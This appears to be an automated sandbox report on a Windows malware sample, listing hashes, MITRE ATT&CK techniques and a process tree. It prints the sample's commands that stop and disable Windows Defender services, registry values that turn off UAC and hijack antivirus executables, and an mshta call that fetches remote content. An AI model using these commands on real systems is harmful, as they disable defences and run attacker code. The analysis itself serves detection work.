Analysis
-
max time kernel
150s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23-08-2024 07:17
Static task
static1
Behavioral task
behavioral1
Sample
bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe
-
Size
2.2MB
-
MD5
bace3b705692dd51098d62cfab3e4c7a
-
SHA1
709c80482b025237a006bb84101cfa3d1327c0e9
-
SHA256
0f8478e87936627ba79b070ef5e433348b2b490f41409004651bf8127b197ff3
-
SHA512
429b74ba446fff14365e57648b485d1513a69858fdd5627335a232fdffd76f2af122cc023a8b0eaf456a658fc2b605b920049bac2264af34ee724c3131aa4749
-
SSDEEP
49152:CMGZ+nS10IELGTCb6bweJKFbC8PX8lD6qo9jTdpA4GkxDC:CySeIELGGbc0FbxI+q6TdpA4xpC
Malware Config
Extracted
http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=KVIWLPUJ&2=i-s&3=225&4=9200&5=6&6=2&7=919041&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\kitljn.exe" kitljn.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" kitljn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" kitljn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" kitljn.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe kitljn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" kitljn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" kitljn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" kitljn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe kitljn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" kitljn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe kitljn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe kitljn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe kitljn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" kitljn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" kitljn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe kitljn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" kitljn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" kitljn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe kitljn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe kitljn.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 4260 kitljn.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" kitljn.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2776 sc.exe 1868 sc.exe 2312 sc.exe 1296 sc.exe 4888 sc.exe 1188 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kitljn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4260 kitljn.exe Token: SeShutdownPrivilege 4260 kitljn.exe Token: SeDebugPrivilege 4260 kitljn.exe Token: SeShutdownPrivilege 4260 kitljn.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe 4260 kitljn.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 4792 wrote to memory of 1188 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 86 PID 4792 wrote to memory of 1188 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 86 PID 4792 wrote to memory of 1188 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 86 PID 4792 wrote to memory of 2776 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 87 PID 4792 wrote to memory of 2776 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 87 PID 4792 wrote to memory of 2776 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 87 PID 4792 wrote to memory of 3896 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 88 PID 4792 wrote to memory of 3896 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 88 PID 4792 wrote to memory of 3896 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 88 PID 4792 wrote to memory of 1868 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 89 PID 4792 wrote to memory of 1868 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 89 PID 4792 wrote to memory of 1868 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 89 PID 4792 wrote to memory of 4260 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 94 PID 4792 wrote to memory of 4260 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 94 PID 4792 wrote to memory of 4260 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 94 PID 3896 wrote to memory of 3076 3896 net.exe 95 PID 3896 wrote to memory of 3076 3896 net.exe 95 PID 3896 wrote to memory of 3076 3896 net.exe 95 PID 4792 wrote to memory of 32 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 97 PID 4792 wrote to memory of 32 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 97 PID 4792 wrote to memory of 32 4792 bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe 97 PID 4260 wrote to memory of 2312 4260 kitljn.exe 99 PID 4260 wrote to memory of 2312 4260 kitljn.exe 99 PID 4260 wrote to memory of 2312 4260 kitljn.exe 99 PID 4260 wrote to memory of 1296 4260 kitljn.exe 100 PID 4260 wrote to memory of 1296 4260 kitljn.exe 100 PID 4260 wrote to memory of 1296 4260 kitljn.exe 100 PID 4260 wrote to memory of 3068 4260 kitljn.exe 101 PID 4260 wrote to memory of 3068 4260 kitljn.exe 101 PID 4260 wrote to memory of 3068 4260 kitljn.exe 101 PID 4260 wrote to memory of 4888 4260 kitljn.exe 102 PID 4260 wrote to memory of 4888 4260 kitljn.exe 102 PID 4260 wrote to memory of 4888 4260 kitljn.exe 102 PID 3068 wrote to memory of 4768 3068 net.exe 107 PID 3068 wrote to memory of 4768 3068 net.exe 107 PID 3068 wrote to memory of 4768 3068 net.exe 107 PID 4260 wrote to memory of 1584 4260 kitljn.exe 108 PID 4260 wrote to memory of 1584 4260 kitljn.exe 108 PID 4260 wrote to memory of 1584 4260 kitljn.exe 108 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System kitljn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" kitljn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" kitljn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" kitljn.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1188
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2776
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
PID:3076
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1868
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\kitljn.exeC:\Users\Admin\AppData\Roaming\Microsoft\kitljn.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4260 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2312
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1296
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
- System Location Discovery: System Language Discovery
PID:4768
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4888
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=KVIWLPUJ&2=i-s&3=225&4=9200&5=6&6=2&7=919041&8=1033"3⤵
- System Location Discovery: System Language Discovery
PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\BACE3B~1.EXE" >> NUL2⤵
- System Location Discovery: System Language Discovery
PID:32
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD5bace3b705692dd51098d62cfab3e4c7a
SHA1709c80482b025237a006bb84101cfa3d1327c0e9
SHA2560f8478e87936627ba79b070ef5e433348b2b490f41409004651bf8127b197ff3
SHA512429b74ba446fff14365e57648b485d1513a69858fdd5627335a232fdffd76f2af122cc023a8b0eaf456a658fc2b605b920049bac2264af34ee724c3131aa4749